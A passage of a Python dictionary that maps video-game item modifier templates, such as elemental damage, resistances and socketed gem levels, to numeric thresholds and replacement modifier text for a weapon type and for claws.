"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(33 - 36)% increased Fire Damage'), (22, '(37 - 40)% increased Fire Damage'), (50, '(41 - 44)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (27 - 32)% increased Spell Damage'), (500, 'Triggered Spells deal (33 - 38)% increased Spell Damage')],
"#% chance to cause Bleeding on Hit": [(50, '(14 - 18)% increased Damage with Bleeding'), (100, '(19 - 23)% increased Damage with Bleeding'), (300, '(24 - 28)% increased Damage with Bleeding\n(15 - 20)% chance to cause Bleeding on Hit')],
"#% chance to deal Double Damage": [(18, '4% chance to deal Double Damage'), (50, '5% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(90, '(29 - 35)% increased Attack Damage\n(29 - 35)% increased Spell Damage'), (200, '(36 - 44)% increased Attack Damage\n(36 - 44)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(100, '(3 - 4)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(100, '(3 - 4)% increased Attack Speed')],
"#% increased Bleeding Duration": [(20, '(14 - 18)% increased Damage with Bleeding'), (40, '(19 - 23)% increased Damage with Bleeding'), (100, '(24 - 28)% increased Damage with Bleeding\n(8 - 12)% increased Bleeding Duration')],
"#% increased Chaos Damage": [(110, '(29 - 32)% increased Chaos Damage'), (220, '(33 - 36)% increased Chaos Damage'), (500, '(37 - 40)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(29 - 32)% increased Cold Damage'), (200, '(33 - 36)% increased Cold Damage'), (300, '(37 - 40)% increased Cold Damage'), (350, '(41 - 44)% increased Cold Damage'), (1000, '(20 - 30)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(16, '2% increased Damage per Endurance Charge'), (50, '(4 - 5)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(16, '2% increased Damage per Frenzy Charge'), (50, '(4 - 5)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(16, '2% increased Damage per Power Charge'), (50, '(4 - 5)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(130, '(21 - 26)% increased Damage'), (260, '(27 - 32)% increased Damage'), (500, '(33 - 38)% increased Damage')],
"#% increased Damage with Bleeding": [(45, '(14 - 18)% increased Damage with Bleeding'), (90, '(19 - 23)% increased Damage with Bleeding'), (200, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (30 - 35)% faster')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (30 - 35)% faster')],
"#% increased Elemental Damage": [(130, '(21 - 26)% increased Elemental Damage'), (260, '(27 - 32)% increased Elemental Damage'), (500, '(33 - 38)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(29 - 32)% increased Fire Damage'), (200, '(33 - 36)% increased Fire Damage'), (300, '(37 - 40)% increased Fire Damage'), (350, '(41 - 44)% increased Fire Damage'), (1000, '(20 - 30)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 5% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(29 - 32)% increased Lightning Damage'), (200, '(33 - 36)% increased Lightning Damage'), (300, '(37 - 40)% increased Lightning Damage'), (350, '(41 - 44)% increased Lightning Damage'), (1000, '(20 - 30)% increased Conductivity Curse Effect')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Projectile Speed": [(40, '(9 - 10)% increased Projectile Speed'), (80, '(11 - 12)% increased Projectile Speed'), (115, '(13 - 14)% increased Projectile Speed'), (135, '(15 - 17)% increased Projectile Speed'), (200, '(18 - 20)% increased Projectile Speed\nBow Attacks fire an additional Arrow')],
"#% increased Spell Damage": [(125, '(22 - 24)% increased Spell Damage'), (250, '(25 - 28)% increased Spell Damage'), (375, '(29 - 35)% increased Spell Damage'), (420, '(45 - 51)% increased Spell Damage'), (1000, 'Spells have a (16 - 18)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(1.17, '(7 - 9)% increased maximum Energy Shield'), (2.33, '(10 - 13)% increased maximum Energy Shield'), (8.33, '(14 - 16)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Mana Regenerated per second')],
"#% of Physical Attack Damage Leeched as Life": [(0.4, '0.2% of Physical Attack Damage Leeched as Life'), (0.7, '0.3% of Physical Attack Damage Leeched as Life'), (1.0, '0.4% of Physical Attack Damage Leeched as Life'), (4.0, '3.0% of Physical Attack Damage Leeched as Life')],
"#% of Physical Attack Damage Leeched as Mana": [(0.4, '0.1% of Physical Attack Damage Leeched as Mana'), (0.7, '0.2% of Physical Attack Damage Leeched as Mana'), (1.0, '0.3% of Physical Attack Damage Leeched as Mana'), (4.0, '1.0% of Physical Attack Damage Leeched as Mana')],
"#% reduced Attribute Requirements": [(60, '(6 - 7) to all Attributes'), (70, '(8 - 9) to all Attributes'), (85, '(10 - 12) to all Attributes'), (100, '1 to Maximum Frenzy Charges')],
"#% reduced Soul Cost of Vaal Skills": [(55, 'Vaal Skills deal (36 - 44)% increased Damage'), (110, 'Vaal Skills deal (45 - 51)% increased Damage'), (200, '(60 - 70)% increased Attack Damage if Corrupted')],
"+# Life gained for each Enemy hit by your Attacks": [(4, '(4 - 5) Life gained for each Enemy hit by your Attacks'), (7, '(6 - 8) Life gained for each Enemy hit by your Attacks'), (10, '(9 - 15) Life gained for each Enemy hit by your Attacks'), (15, '(45 - 50) Life gained for each Enemy hit by your Attacks')],
"+# to Accuracy Rating": [(500, '(10 - 15)% increased Global Accuracy Rating'), (1000, '(20 - 25)% increased Global Accuracy Rating'), (2000, '(30 - 35)% increased Global Accuracy Rating')],
"+# to Armour if you've Hit an Enemy Recently": [(1100, '(14 - 16)% increased Armour'), (2200, '(17 - 19)% increased Armour'), (5000, '(20 - 22)% increased Armour')],
"+# to Dexterity": [(40, '(6 - 8) to Dexterity'), (70, '(9 - 11) to Dexterity'), (100, '(12 - 14) to Dexterity'), (130, '(15 - 17) to Dexterity'), (160, '(18 - 20) to Dexterity'), (200, 'Adds (2 - 3) to (4 - 5) Cold Damage to Attacks with this Weapon per 10 Dexterity')],
"+# to Dexterity and Intelligence": [(20, '(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+# to Evasion Rating if Hit an Enemy Recently": [(1100, '(14 - 16)% increased Evasion Rating'), (2200, '(17 - 19)% increased Evasion Rating'), (5000, '(20 - 22)% increased Evasion Rating')],
"+# to Level of Socketed Bow Gems": [(3, '(2 - 3) to Quality of Socketed Bow Gems'), (5, '(4 - 6) to Quality of Socketed Bow Gems'), (10, '1 to Level of Socketed Bow Gems')],
"+# to Level of Socketed Chaos Gems": [(3, '(2 - 3) to Quality of Socketed Chaos Gems'), (5, '(4 - 6) to Quality of Socketed Chaos Gems'), (10, '1 to Level of Socketed Chaos Gems')],
"+# to Level of Socketed Cold Gems": [(3, '(2 - 3) to Quality of Socketed Cold Gems'), (5, '(4 - 6) to Quality of Socketed Cold Gems'), (10, '1 to Level of Socketed Cold Gems')],
"+# to Level of Socketed Dexterity Gems": [(1, '(2 - 3) to Quality of Socketed Dexterity Gems'), (2, '(4 - 6) to Quality of Socketed Dexterity Gems'), (5, '1 to Level of Socketed Dexterity Gems')],
"+# to Level of Socketed Fire Gems": [(3, '(2 - 3) to Quality of Socketed Fire Gems'), (5, '(4 - 6) to Quality of Socketed Fire Gems'), (10, '1 to Level of Socketed Fire Gems')],
"+# to Level of Socketed Gems": [(1, '(2 - 3) to Quality of Socketed Gems'), (2, '(4 - 6) to Quality of Socketed Gems'), (10, '1 to Level of Socketed Gems')],
"+# to Level of Socketed Intelligence Gems": [(1, '(2 - 3) to Quality of Socketed Intelligence Gems'), (2, '(4 - 6) to Quality of Socketed Intelligence Gems'), (5, '1 to Level of Socketed Intelligence Gems')],
"+# to Level of Socketed Lightning Gems": [(3, '(2 - 3) to Quality of Socketed Lightning Gems'), (5, '(4 - 6) to Quality of Socketed Lightning Gems'), (10, '1 to Level of Socketed Lightning Gems')],
"+# to Level of Socketed Strength Gems": [(1, '(2 - 3) to Quality of Socketed Strength Gems'), (2, '(4 - 6) to Quality of Socketed Strength Gems'), (5, '1 to Level of Socketed Strength Gems')],
"+# to Level of Socketed Support Gems": [(3, '(2 - 3) to Quality of Socketed Support Gems'), (5, '(4 - 6) to Quality of Socketed Support Gems'), (10, '1 to Level of Socketed Support Gems')],
"+# to Strength and Dexterity": [(20, '(6 - 8) to Strength\n(6 - 8) to Dexterity'), (45, '(9 - 11) to Strength\n(9 - 11) to Dexterity'), (100, '(12 - 14) to Strength\n(12 - 14) to Dexterity')],
"+# to Strength and Intelligence": [(20, '(6 - 8) to Strength\n(6 - 8) to Intelligence'), (45, '(9 - 11) to Strength\n(9 - 11) to Intelligence'), (100, '(12 - 14) to Strength\n(12 - 14) to Intelligence')],
"+# to all Attributes": [(15, '(6 - 8) to Strength\n(6 - 8) to Dexterity\n(6 - 8) to Intelligence'), (30, '(9 - 11) to Strength\n(9 - 11) to Dexterity\n(9 - 11) to Intelligence'), (50, '(12 - 14) to Strength\n(12 - 14) to Dexterity\n(12 - 14) to Intelligence')],
"+#% Critical Strike Multiplier while a Rare or Unique Enemy is Nearby": [(60, '(18 - 20) to Global Critical Strike Multiplier'), (120, '(21 - 23) to Global Critical Strike Multiplier'), (150, '(24 - 26) to Global Critical Strike Multiplier')],
"+#% to Chaos Resistance": [(35, '(5 - 6) to Chaos Resistance'), (70, '(7 - 8) to Chaos Resistance'), (120, '(9 - 10) to Chaos Resistance')],
"+#% to Cold Resistance": [(50, '8 to Cold Resistance'), (75, '(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Cold Resistance'), (125, '(13 - 14) to Cold Resistance'), (150, '(15 - 16) to Cold Resistance')],
"+#% to Cold and Chaos Resistances": [(35, '8 to Cold Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Cold Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Cold and Lightning Resistances": [(20, '8 to Cold Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Cold Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Cold Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Fire Resistance": [(50, '8 to Fire Resistance'), (75, '(9 - 10) to Fire Resistance'), (100, '(11 - 12) to Fire Resistance'), (125, '(13 - 14) to Fire Resistance'), (150, '(15 - 16) to Fire Resistance')],
"+#% to Fire and Chaos Resistances": [(35, '8 to Fire Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Fire Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Fire and Cold Resistances": [(20, '8 to Fire Resistance\n8 to Cold Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Cold Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Cold Resistance')],
"+#% to Fire and Lightning Resistances": [(20, '8 to Fire Resistance\n8 to Lightning Resistance'), (40, '(9 - 10) to Fire Resistance\n(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Fire Resistance\n(11 - 12) to Lightning Resistance')],
"+#% to Global Critical Strike Multiplier": [(25, '(15 - 17) to Global Critical Strike Multiplier'), (50, '(18 - 20) to Global Critical Strike Multiplier'), (75, '(21 - 23) to Global Critical Strike Multiplier'), (100, '(24 - 26) to Global Critical Strike Multiplier'), (200, '(27 - 30) to Global Critical Strike Multiplier')],
"+#% to Lightning Resistance": [(50, '8 to Lightning Resistance'), (75, '(9 - 10) to Lightning Resistance'), (100, '(11 - 12) to Lightning Resistance'), (125, '(13 - 14) to Lightning Resistance'), (150, '(15 - 16) to Lightning Resistance')],
"+#% to Lightning and Chaos Resistances": [(35, '8 to Lightning Resistance\n(5 - 6) to Chaos Resistance'), (100, '(9 - 10) to Lightning Resistance\n(7 - 8) to Chaos Resistance')],
"+#% to Quality of Socketed Gems": [(20, '(2 - 3) to Quality of Socketed Gems'), (50, '(4 - 6) to Quality of Socketed Gems')],
"Adds # to # Chaos Damage": [(300, 'Adds (7 - 12) to (15 - 26) Chaos Damage'), (450, 'Adds (13 - 21) to (27 - 49) Chaos Damage'), (1000, 'Adds (22 - 43) to (50 - 74) Chaos Damage')],
"Adds # to # Cold Damage": [(50, 'Adds (3 - 6) to (7 - 11) Cold Damage'), (100, 'Adds (7 - 10) to (12 - 18) Cold Damage'), (150, 'Adds (11 - 15) to (19 - 26) Cold Damage'), (200, 'Adds (16 - 20) to (27 - 35) Cold Damage'), (1000, 'Adds (21 - 25) to (36 - 43) Cold Damage')],
"Adds # to # Cold Damage to Spells": [(100, 'Adds (4 - 6) to (8 - 13) Cold Damage to Spells'), (180, 'Adds (7 - 11) to (14 - 20) Cold Damage to Spells'), (250, 'Adds (12 - 16) to (21 - 28) Cold Damage to Spells'), (280, 'Adds (17 - 21) to (28 - 38) Cold Damage to Spells'), (1000, 'Adds (22 - 26) to (31 - 46) Cold Damage to Spells')],
"Adds # to # Fire Damage": [(80, 'Adds (4 - 8) to (9 - 15) Fire Damage'), (160, 'Adds (9 - 12) to (16 - 23) Fire Damage'), (210, 'Adds (13 - 18) to (24 - 31) Fire Damage'), (250, 'Adds (19 - 24) to (32 - 43) Fire Damage'), (1000, 'Adds (25 - 30) to (44 - 53) Fire Damage')],
"Adds # to # Fire Damage to Spells": [(100, 'Adds (5 - 9) to (10 - 15) Fire Damage to Spells'), (200, 'Adds (10 - 14) to (16 - 25) Fire Damage to Spells'), (275, 'Adds (14 - 19) to (26 - 34) Fire Damage to Spells'), (320, 'Adds (20 - 25) to (35 - 45) Fire Damage to Spells'), (1000, 'Adds (26 - 32) to (46 - 56) Fire Damage to Spells')],
"Adds # to # Lightning Damage": [(150, 'Adds 1 to (16 - 25) Lightning Damage'), (300, 'Adds (1 - 2) to (26 - 40) Lightning Damage'), (375, 'Adds (1 - 3) to (41 - 55) Lightning Damage'), (430, 'Adds (2 - 5) to (56 - 70) Lightning Damage'), (1000, 'Adds (2 - 6) to (71 - 83) Lightning Damage')],
"Adds # to # Lightning Damage to Spells": [(150, 'Adds 1 to (18 - 28) Lightning Damage to Spells'), (300, 'Adds (1 - 3) to (29 - 46) Lightning Damage to Spells'), (450, 'Adds (2 - 4) to (47 - 58) Lightning Damage to Spells'), (540, 'Adds (2 - 5) to (59 - 75) Lightning Damage to Spells'), (1000, 'Adds (3 - 7) to (75 - 88) Lightning Damage to Spells')],
"Adds # to # Physical Damage": [(50, 'Adds 1 to (2 - 3) Physical Damage'), (100, 'Adds (2 - 3) to (4 - 5) Physical Damage'), (150, 'Adds (4 - 5) to (6 - 7) Physical Damage'), (180, 'Adds (6 - 7) to (8 - 10) Physical Damage'), (500, 'Adds (8 - 9) to (11 - 13) Physical Damage')],
"Attacks with this Weapon Penetrate #% Chaos Resistance": [(22, '(25 - 28)% increased Chaos Damage'), (44, '(29 - 32)% increased Chaos Damage'), (100, '(33 - 36)% increased Chaos Damage')],
"Attacks with this Weapon Penetrate #% Elemental Resistances": [(22, '(21 - 26)% increased Elemental Damage'), (44, '(27 - 32)% increased Elemental Damage'), (100, '(33 - 38)% increased Elemental Damage\nAttacks with this Weapon Penetrate 3% Elemental Resistances')],
"Auras from your Skills grant #% increased Damage to you and Allies": [(5, 'You and Allies affected by your Aura Skills deal (13 - 16)% increased Damage'), (9, 'You and Allies affected by your Aura Skills deal (17 - 21)% increased Damage'), (20, 'You and Allies affected by your Aura Skills deal (22 - 25)% increased Damage')],
"Curse Enemies with Level # Despair on Hit": [(11, '(29 - 32)% increased Chaos Damage'), (22, '(33 - 36)% increased Chaos Damage'), (50, '(37 - 40)% increased Chaos Damage')],
"Damage Penetrates #% Cold Resistance": [(22, '(33 - 36)% increased Cold Damage'), (44, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage')],
"Damage Penetrates #% Fire Resistance": [(22, '(33 - 36)% increased Fire Damage'), (44, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage')],
"Damage Penetrates #% Lightning Resistance": [(22, '(33 - 36)% increased Lightning Damage'), (44, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage')],
"Gain #% of Cold Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Cold Damage'), (70, '(37 - 40)% increased Cold Damage'), (100, '(41 - 44)% increased Cold Damage\nGain (7 - 10)% of Cold Damage as Extra Chaos Damage')],
"Gain #% of Fire Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Fire Damage'), (70, '(37 - 40)% increased Fire Damage'), (100, '(41 - 44)% increased Fire Damage\nGain (7 - 10)% of Fire Damage as Extra Chaos Damage')],
"Gain #% of Lightning Damage as Extra Chaos Damage": [(35, '(33 - 36)% increased Lightning Damage'), (70, '(37 - 40)% increased Lightning Damage'), (100, '(41 - 44)% increased Lightning Damage\nGain (7 - 10)% of Lightning Damage as Extra Chaos Damage')],
"Gain #% of Non-Chaos Damage as extra Chaos Damage": [(10, '(25 - 28)% increased Chaos Damage'), (20, '(29 - 32)% increased Chaos Damage'), (50, '(33 - 36)% increased Chaos Damage')],
"Gain #% of Physical Damage as Extra Chaos Damage": [(35, '(27 - 32)% increased Global Physical Damage'), (70, '(33 - 38)% increased Global Physical Damage'), (100, '(39 - 44)% increased Global Physical Damage\nGain (7 - 10)% of Physical Damage as Extra Chaos Damage')],
"Has 1 Abyssal Socket": [(1, '(15 - 20)% increased Damage against Abyssal Monsters'), (2, '(21 - 25)% increased Damage against Abyssal Monsters'), (5, '25% increased Effect of Socketed Jewels')],
"Hits can't be Evaded": [(1, '(10 - 15)% increased Global Accuracy Rating'), (2, '(20 - 25)% increased Global Accuracy Rating'), (5, '(30 - 35)% increased Global Accuracy Rating\n100% increased Global Accuracy Rating')],
"Minions deal #% increased Damage": [(90, 'Minions deal (19 - 22)% increased Damage'), (140, 'Minions deal (27 - 32)% increased Damage'), (180, 'Minions deal (23 - 26)% increased Damage'), (280, 'Minions deal (33 - 38)% increased Damage'), (500, 'Minions deal (27 - 30)% increased Damage'), (500, 'Minions deal (39 - 44)% increased Damage')],
"Socketed Skills deal #% more Attack Damage": [(22, '(29 - 35)% increased Attack Damage'), (44, '(36 - 44)% increased Attack Damage'), (100, '(45 - 51)% increased Attack Damage')],
"Socketed Skills deal #% more Spell Damage": [(22, '(29 - 35)% increased Spell Damage'), (44, '(36 - 44)% increased Spell Damage'), (100, '(45 - 51)% increased Spell Damage')],
"Triggers Level 20 Spectral Spirits when Equipped": [(4, 'Minions deal (11 - 12)% increased Damage'), (7, 'Minions deal (13 - 14)% increased Damage'), (20, 'Minions deal (15 - 16)% increased Damage')],
"Your Hits inflict Decay, dealing 500 Chaos Damage per second for 8 seconds": [(1, '(25 - 28)% increased Chaos Damage'), (2, '(29 - 32)% increased Chaos Damage'), (10, '(33 - 36)% increased Chaos Damage')],
},
"Claw": {
"#% chance for Bleeding inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Bleeding'), (140, '(19 - 23)% increased Damage with Bleeding'), (500, '(24 - 28)% increased Damage with Bleeding\nBleeding you inflict deals Damage (15 - 20)% faster')],
"#% chance for Poisons inflicted with this Weapon to deal 100% more Damage": [(70, '(14 - 18)% increased Damage with Poison'), (140, '(19 - 23)% increased Damage with Poison'), (500, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% chance to Cast Level 20 Fire Burst on Hit": [(11, '(21 - 23)% increased Fire Damage'), (22, '(24 - 26)% increased Fire Damage'), (50, '(27 - 30)% increased Fire Damage')],
"#% chance to Intimidate Enemies for 4 seconds on Hit": [(16, '(4 - 5)% chance to Intimidate Enemies for 4 seconds on Hit'), (32, '(6 - 7)% chance to Intimidate Enemies for 4 seconds on Hit'), (100, '(8 - 10)% chance to Intimidate Enemies for 4 seconds on Hit')],
"#% chance to Poison on Hit": [(50, '(14 - 18)% increased Damage with Poison'), (100, '(19 - 23)% increased Damage with Poison'), (300, '(24 - 28)% increased Damage with Poison\n(25 - 30)% chance to Poison on Hit')],
"#% chance to Trigger a Socketed Spell when you Use a Skill": [(250, 'Triggered Spells deal (19 - 22)% increased Spell Damage'), (500, 'Triggered Spells deal (23 - 26)% increased Spell Damage')],
"#% chance to deal Double Damage": [(8, '2% chance to deal Double Damage'), (50, '3% chance to deal Double Damage')],
"#% chance to deal Double Damage while Focussed": [(40, '(23 - 26)% increased Attack Damage\n(23 - 26)% increased Spell Damage'), (100, '(27 - 30)% increased Attack Damage\n(27 - 30)% increased Spell Damage')],
"#% chance to gain Onslaught for 4 seconds on Kill": [(22, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed')],
"#% chance to gain a Power, Frenzy or Endurance Charge on Kill": [(18, '(8 - 11)% increased Endurance Charge Duration\n(8 - 11)% increased Frenzy Charge Duration\n(8 - 11)% increased Power Charge Duration'), (36, '(12 - 15)% increased Endurance Charge Duration\n(12 - 15)% increased Frenzy Charge Duration\n(12 - 15)% increased Power Charge Duration'), (100, '(5 - 10)% chance to gain an Endurance Charge on Kill\n(5 - 10)% chance to gain a Frenzy Charge on Kill\n(5 - 10)% chance to gain a Power Charge on Kill')],
"#% increased Attack Speed": [(30, '(3 - 4)% increased Attack Speed'), (50, '(5 - 6)% increased Attack Speed'), (100, '(7 - 8)% increased Attack Speed')],
"#% increased Attack Speed while a Rare or Unique Enemy is Nearby": [(30, '(3 - 4)% increased Attack Speed'), (100, '(5 - 6)% increased Attack Speed')],
"#% increased Chaos Damage": [(75, '(18 - 20)% increased Chaos Damage'), (150, '(21 - 23)% increased Chaos Damage'), (500, '(24 - 26)% increased Chaos Damage')],
"#% increased Cold Damage": [(100, '(18 - 20)% increased Cold Damage'), (160, '(21 - 23)% increased Cold Damage'), (220, '(24 - 26)% increased Cold Damage'), (280, '(27 - 30)% increased Cold Damage'), (1000, '(10 - 15)% increased Frostbite Curse Effect')],
"#% increased Critical Strike Chance": [(25, '(5 - 6)% increased Critical Strike Chance'), (50, '(7 - 8)% increased Critical Strike Chance'), (75, '(9 - 10)% increased Critical Strike Chance'), (100, '(11 - 12)% increased Critical Strike Chance'), (200, '(13 - 15)% increased Critical Strike Chance')],
"#% increased Critical Strike Chance for Spells": [(100, '(29 - 31)% increased Critical Strike Chance for Spells'), (175, '(32 - 34)% increased Critical Strike Chance for Spells'), (250, '(35 - 37)% increased Critical Strike Chance for Spells'), (325, '(38 - 41)% increased Critical Strike Chance for Spells'), (500, '(42 - 45)% increased Critical Strike Chance for Spells')],
"#% increased Damage per Endurance Charge": [(10, '2% increased Damage per Endurance Charge'), (50, '(3 - 4)% increased Damage per Endurance Charge')],
"#% increased Damage per Frenzy Charge": [(10, '2% increased Damage per Frenzy Charge'), (50, '(3 - 4)% increased Damage per Frenzy Charge')],
"#% increased Damage per Power Charge": [(10, '2% increased Damage per Power Charge'), (50, '(3 - 4)% increased Damage per Power Charge')],
"#% increased Damage when on Full Life": [(70, '(15 - 18)% increased Damage'), (140, '(19 - 22)% increased Damage'), (500, '(23 - 26)% increased Damage')],
"#% increased Damage with Poison": [(45, '(14 - 18)% increased Damage with Poison'), (90, '(19 - 23)% increased Damage with Poison'), (200, '(24 - 28)% increased Damage with Poison\nPoisons you inflict deal Damage (15 - 20)% faster')],
"#% increased Elemental Damage": [(70, '(17 - 19)% increased Elemental Damage'), (140, '(20 - 22)% increased Elemental Damage'), (500, '(23 - 26)% increased Elemental Damage\nDamage Penetrates (3 - 5)% Elemental Resistances')],
"#% increased Elemental Damage with Attack Skills": [(50, 'Attacks with this Weapon Penetrate 2% Elemental Resistances'), (100, 'Attacks with this Weapon Penetrate 3% Elemental Resistances'), (300, 'Attacks with this Weapon Penetrate (4 - 5)% Elemental Resistances')],
"#% increased Fire Damage": [(100, '(18 - 20)% increased Fire Damage'), (160, '(21 - 23)% increased Fire Damage'), (220, '(24 - 26)% increased Fire Damage'), (280, '(27 - 30)% increased Fire Damage'), (1000, '(10 - 15)% increased Flammability Curse Effect')],
"#% increased Light Radius": [(20, '10% increased Light Radius'), (30, '12% increased Light Radius'), (35, '15% increased Light Radius'), (100, '15% increased Light Radius\nKilled Enemies Explode, dealing 3% of their Life as Physical Damage')],
"#% increased Lightning Damage": [(100, '(18 - 20)% increased Lightning Damage'), (160, '(21 - 23)% increased Lightning Damage'), (220, '(24 - 26)% increased Lightning Damage'), (280, '(27 - 30)% increased Lightning Damage'), (1000, '(10 - 15)% increased Conductivity Curse Effect')],
"#% increased Mana Regeneration Rate": [(50, '(16 - 18)% increased Mana Regeneration Rate'), (90, '(19 - 21)% increased Mana Regeneration Rate'), (130, '(22 - 24)% increased Mana Regeneration Rate'), (170, '(25 - 27)% increased Mana Regeneration Rate'), (190, '(28 - 30)% increased Mana Regeneration Rate'), (500, '(28 - 30)% increased Mana Regeneration Rate\n0.4% of Attack Damage Leeched as Mana')],
"#% increased Physical Damage": [(200, '(13 - 14)% increased Physical Damage'), (400, '(15 - 16)% increased Physical Damage'), (600, '(17 - 19)% increased Physical Damage'), (725, '(20 - 22)% increased Physical Damage'), (1000, '(23 - 25)% increased Physical Damage')],
"#% increased Poison Duration": [(20, '(14 - 18)% increased Damage with Poison'), (40, '(19 - 23)% increased Damage with Poison'), (100, '(24 - 28)% increased Damage with Poison\n(8 - 12)% increased Poison Duration')],
"#% increased Spell Damage": [(90, '(16 - 18)% increased Spell Damage'), (180, '(19 - 22)% increased Spell Damage'), (270, '(23 - 26)% increased Spell Damage'), (300, '(31 - 35)% increased Spell Damage'), (1000, 'Spells have a (8 - 10)% chance to deal Double Damage')],
"#% increased Stun Duration on Enemies": [(50, '(15 - 17)% increased Stun Duration on Enemies'), (300, '(26 - 35)% increased Stun Duration on Enemies')],
"#% of Energy Shield Regenerated per second if you've Hit an Enemy Recently": [(0.67, '(4 - 5)% increased maximum Energy Shield'), (1.33, '(6 - 7)% increased maximum Energy Shield'), (8.33, '(8 - 10)% increased maximum Energy Shield')],
"#% of Mana Regenerated per second if you've Hit an Enemy Recently": [(0.42, '(22 - 24)% increased Mana Regeneration Rate'), (0.83, '(25 - 27)% increased Mana Regeneration Rate'), (1.67, '(28 - 30)% increased Mana Regeneration Rate\n0.2% of Mana Regenerated per second')],
